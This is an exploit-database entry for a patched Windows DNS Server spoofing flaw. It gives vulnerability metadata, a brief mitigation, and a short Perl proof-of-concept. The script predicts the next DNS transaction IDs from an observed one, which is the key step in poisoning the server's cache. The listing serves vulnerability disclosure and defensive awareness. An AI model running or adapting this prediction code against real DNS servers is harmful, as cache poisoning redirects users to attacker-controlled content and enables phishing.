header-logo
Suggest Exploit
vendor:
Windows DNS Server
by:
5.5
CVSS
MEDIUM
Spoofing
451
CWE
Product Name: Windows DNS Server
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: o:microsoft:windows
Metasploit:
Other Scripts:
Platforms Tested: Windows

Microsoft Windows DNS Server Spoofing Vulnerability

The vulnerability allows an attacker to spoof responses to DNS requests, corrupting the DNS cache with attacker-specified content. This can aid in further attacks such as phishing.

Mitigation:

Apply the appropriate security updates provided by Microsoft to address this vulnerability. Additionally, it is recommended to restrict access to the DNS server to trusted sources only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25919/info

Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.

A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing. 

$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
	print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
	exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
	print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
	exit(0);
}

print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$m++)
{
	print "".(($m<<11)|((($C+1) % 256)<<3))." ";
}
print "\n";